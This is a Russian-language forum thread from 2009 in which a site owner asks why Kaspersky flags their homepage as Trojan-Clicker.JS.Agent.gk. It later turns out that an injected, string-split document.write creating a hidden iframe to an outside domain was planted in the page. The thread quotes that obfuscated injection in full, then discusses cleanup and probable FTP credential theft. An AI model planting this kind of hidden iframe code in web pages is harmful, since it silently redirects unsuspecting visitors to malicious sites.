Обнаружен Trojan-Clicker.JS.Agent.gk там, где его нет

[dthnth]

Добрый день.

Прошу прощения, если тема не в том разделе.

 

 

вобщем такие дела :

есть сайт, написанный на html и джава скрипты на нем созданы в программе UltraMenu, - открывающиеся менюшки для подразделов.

 

с 25-го числа, как написано на вирус листе

Время детектирования 25 июн 2009 12:13 MSK

Время выпуска обновления 25 июн 2009 16:33 MSK

данные скрипты почему то определяются Касперским как вредоносные. Почему они стали вредоносными ?

 

вот начало index.htm, который определяется как вирус:

 

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>ЦЕНТР ЗАЩИТЫ СТРОИТЕЛЬНЫХ КОНСТРУКЦИЙ</title>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">

<link rel="stylesheet" type="text/css" href="CSS/limb.css">

<script type="text/javascript" language="JavaScript1.2" src="JS/um_menu.js"></script>

<link href="CSS/menu.css" rel="stylesheet" type="text/css">

 

 

 

</head>

<body ><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-7623457-2");

pageTracker._trackPageview();

} catch(err) {}</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-9224876-1");

pageTracker._trackPageview();

} catch(err) {}</script>

 

что такого вирусного , похожего на поведение Trojan-Clicker в данном коде ?

до 25-го июня таких проблем не было.

 

----------------------------

 

далее обнаружили мы все таки

что это :

><script>document.write("<"+"i"+"f"+"ram"+"e sr"+"c=\"h"+"t"+"tp"+":"+"/"+"/tr"+"ught"+""+"s"+"a.c"+"o"+"m/\" wid"+"th=1 he"+"ight"+"="+"2></if"+"r"+"a"+""+"me>");</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-32645524-1");pageTracker._trackPageview();} catch(err) {}</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-7623457-2");

pageTracker._trackPageview();

} catch(err) {}</script>

<script type="text/javascript">

try {

var pageTracker = _gat._getTracker("UA-9224876-1");

pageTracker._trackPageview();

} catch(err) {}</script>

 

не наше и удалено было из index

однако вопрос, каким образом это могло прицепиться к странице ? к которой нет доступа ни у кого кроме хостера ?

Изменено 29 июня, 2009 пользователем dthnth

[ROME'D'ROS]

Отправьте этот скрипт на newvirus@kaspersky.com ,с пометкой "Ложное срабатывание".

[Самогонщик]

Здравствуйте,

 

Почему вырешили, что это ложное срабатывание?

В коде страничке вставлен зловредный зашифрованный код, который ведет на сайт _http://trughtsa.com, который в свою очередь ведет на porno.com

Сайт действительно заражен

[ROME'D'ROS]

Цитата

Здравствуйте,

 

Почему вырешили, что это ложное срабатывание?

В коде страничке вставлен зловредный зашифрованный код, который ведет на сайт _http://trughtsa.com, который в свою очередь ведет на porno.com

 

Сайт действительно заражен

Вот видите,оказалось заражён.

[akoK]

ROME'D'ROS, сейчас сайт недоступен.

[dthnth]

да, прошу прощения, действительно мы не правы, срабатывание верное (

вот если бы не касперский, так бы мы были и не в курсе.

ни нод, ни авира, ни дрвеб не реагируют на это.

 

разработчик глядя на код скрипта , увидел лишнее после постинга моего на этом форуме.

 

остается вопрос, как можно было изменить код файла htm , лежащего на сервере провайдера, к которому ни у кого нет доступа кроме провайдера и нас,

понимаю , что это вопрос не для данного форума.

прошу великодушно простить.

просто мы немного в афиге и шоке,

ибо скрипты менюшек раскрывающихся , вообще говоря не способны быть переделанными извне в возможность редактирования htm файла на хосте.

хотя могу ошибаться..

Изменено 29 июня, 2009 пользователем dthnth

[Tishkin Andrew]

остается вопрос, как можно было изменить код файла htm , лежащего на сервере провайдера, к которому ни у кого нет доступа кроме провайдера и нас,

Вчера пришло письмо от Google-а, что на моём сайте две страницы заражены. Я тоже в лёгком шоке оказался... Вредоносный скрипт из страниц удалил, в кабинете веб-мастера на гугле запросил повторное сканирование сайта, и послал письмо хостеру

 

Получил ответ:

Прочитайте наш FAQ насчет вирусов на сайте и будьте осторожны на будущее.

 

В FAQ написано вот что:

В: Когда я открываю свой сайт в браузере, мой антивирус выдает сообщение о том, что на нем найден вирус (вирус на сайте, вредоносный код). Что мне делать?

О: На ваш домашний компьютер попала троянская программа, которая украла данные для доступа к вашему сайту и заразила ваш сайт.

 

Вам следует сделать следующее:

 

1. Про сканировать ваш домашний ПК антивирусом со свежими антивирусными базами.

2. Изменить пароль от cPanel (функция "Изменить пароль", в панели управления cPanel).

3. Закачать все файлы сайта заново.

4. Не сохранять пароль для доступа к сайту в кеше ftp клиентов, браузеров.

 

Я почти уверен, что никакой троян не мог у меня из FTP-клиента Filezilla выдернуть логин и пароль KIS бы не позволил, хотя всё может быть, но мне слабо верится в это

Изменено 29 июня, 2009 пользователем Tishkin Andrew

[dthnth]

ну вот и у нас, на всех компьютерах, имеющих доступ к фтп данного сайта - стоит касперский , и никакой из них не заражен,

правда у нас не кис стоит,

а kav, но он тоже исправно ругается на заражение,

как могло пройти заражение и изменение файла - интересно,

ради полумеры временной , мы изменили атрибут файла на сервере так, что бы невозможно было изменять.

ждем повторения банкета , грубо говоря )